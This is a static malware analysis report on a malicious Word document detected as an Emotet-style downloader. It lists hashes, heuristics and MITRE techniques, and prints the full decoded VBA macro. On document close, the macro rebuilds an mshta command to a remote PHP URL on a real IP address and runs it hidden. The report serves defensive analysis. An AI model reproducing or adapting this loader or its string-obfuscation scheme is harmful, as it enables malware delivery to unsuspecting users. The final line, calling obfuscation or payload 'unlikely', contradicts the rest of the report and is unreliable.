Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e08f1f54620bafe4…

MALICIOUS

Office (OOXML)

54.9 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-05-10
MD5: d38bf4f8675fc8e27d533e6c489bac03 SHA-1: ede200073e2e9db262b255a1fbe7bf61c5436075 SHA-256: e08f1f54620bafe44200b3e12177e6a934e2d27910125144aec9606b68d44a88
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing a high-confidence VBA macro. The macro is obfuscated and uses CreateObject to instantiate WScript.Shell, indicating it is designed to execute commands. The reconstructed URL 'http://104.144.207.225/LEX/DKKGDdKfLqTEnirwxOMEYoWDnich.php?urwxOMEYoWDniWurEjucyKAOKMUjFTjTRyoWn=proj' suggests the macro's purpose is to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2876 bytes
SHA-256: f9c4bf056d94491599cf7131b42a8a14f6336cd3e4f16f3400204396aae59af4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub uretra()
 xyOxPRk = 391 - 66 - 1198 - 715 - 236 - 1564
UVpLKTKz = 1442 - 1700 - 1945
wRYuqMqIEv = 1251 + 1792 + 1472 + 315 + 782
IFASDGE = "T" & "L" & "K"
KEVTHrbHZ = Trim("d") & "Y" & "A" & "U"

 ruivo = "WurEjucyKAOKDKKGDdKfLqTEhrwxOMEYoWDniMUjFTjTRyoWn hrwxOMEYoWDnirwxOMEYoWDnip://104.144.207.225/LEX/DKKGDdKfLqTEnirwxOMEYoWDnich.php?urwxOMEYoWDniWurEjucyKAOKMUjFTjTRyoWn=proj"
ruivo = Replace(ruivo, "WurEjucyKAOK", "m")
QKrBACJkSL = 1376 - 790 - 1743 - 1694 - 43 - 1626 - 215 - 22
rxrqNBoYvx = 1561 - 1559 - 1528 - 24
FPQcBLo = 801 + 720 + 1185 + 470 + 1285
ruivo = Replace(ruivo, "MUjFTjTRyoWn", "a")
PAGxfKLk = 581 + 1847 + 1817 + 1011
WpkyLwySwU = Trim("A") & "j" & Trim("S")
ruivo = Replace(ruivo, "DKKGDdKfLqTE", "s")
gXYRNfRO = 1935 + 1093 + 180 + 1282 + 1422 + 61
WyjyfTdbkdg = Trim("z") & "R" & Trim("j")
SPUZYYnIX = 1764 - 1712 - 952 - 1352
ruivo = Replace(ruivo, "rwxOMEYoWDni", "t")
fXVUgIiE = 7 - 443 - 953 - 653 - 848
DQvIKnoBdQ = 257 - 1931 - 1159
WAToDfUPF = 1558 + 926 + 258 + 1296 + 969
ruivo = Replace(ruivo, "WNWcqZzHDinZ", "e")
ruivo = Replace(ruivo, "JJPoKxDLrOGT", "l")
joQAqIWId = 1074 - 256 - 1805 - 1305 - 1281
vOJHwOpr = "g" & Trim("S") & Trim("K")

licoroso = "WScripOVAYPVVIkSVX.ShxqFnHdHKZpurnTUOFjynIGjxnTUOFjynIGjx"
licoroso = Replace(licoroso, "czCwAkPqrXqq", "m")
qGgpqpXZNx = "M" & Trim("X") & "w"
yPbjBzY = "j" & "r" & "c" & Trim("Z") & "L"
BjwTPCCuQyzp = 1409 - 451 - 1836 - 713 - 1666 - 220 - 336
licoroso = Replace(licoroso, "JwzKpFVBLVdr", "a")
licoroso = Replace(licoroso, "zqSixukYXfPb", "s")
licoroso = Replace(licoroso, "OVAYPVVIkSVX", "t")
rOkjFqpvfoJ = 938 + 1964 + 407 + 1135 + 1201
zTjFCAfvggUF = 1383 + 595 + 124 + 272 + 1032 + 1585
WfkEAEP = 801 - 847 - 1039
licoroso = Replace(licoroso, "xqFnHdHKZpur", "e")
licoroso = Replace(licoroso, "nTUOFjynIGjx", "l")


 CreateObject(licoroso).Run ruivo, 0
 ZIRBXFDFWqY = "A" & "U"
gIACNWwRFZn = Trim("E") & "M" & "G" & Trim("J")
fTjxYzRV = 1169 - 1465 - 1209
pNQxSjCERJ = "x" & Trim("N") & Trim("c") & "x" & "r"
QODoqTARL = "N" & Trim("K") & "W" & Trim("M") & "x"

End Sub

Sub AutoClose()

  NRZbnrnCD = Trim("H") & Trim("x") & Trim("B") & Trim("G")
KoSPuucMbz = Trim("M") & Trim("X") & Trim("b")
UdVnXELqFY = 224 + 1508
vNWcCHTI = 829 - 1432 - 373
GupbvdHBbfEy = "r" & Trim("X") & "B"
QrfJwvDbJnS = 892 + 1645 + 1377 + 1456
gSpiCFcof = 166 - 657 - 909 - 1539 - 1351

  Application.Run "uretra"
  yyDxiVOO = "C" & Trim("v") & "g" & "F" & "M"
bJuHCbYxMQ = 1321 + 223 + 842
NCJkpyik = 1475 - 535 - 67 - 626

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14336 bytes
SHA-256: e5d3e1152f4e5f483800ecfc2df4f5e5fc9176588d6e64eaf454a126e4264e25
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely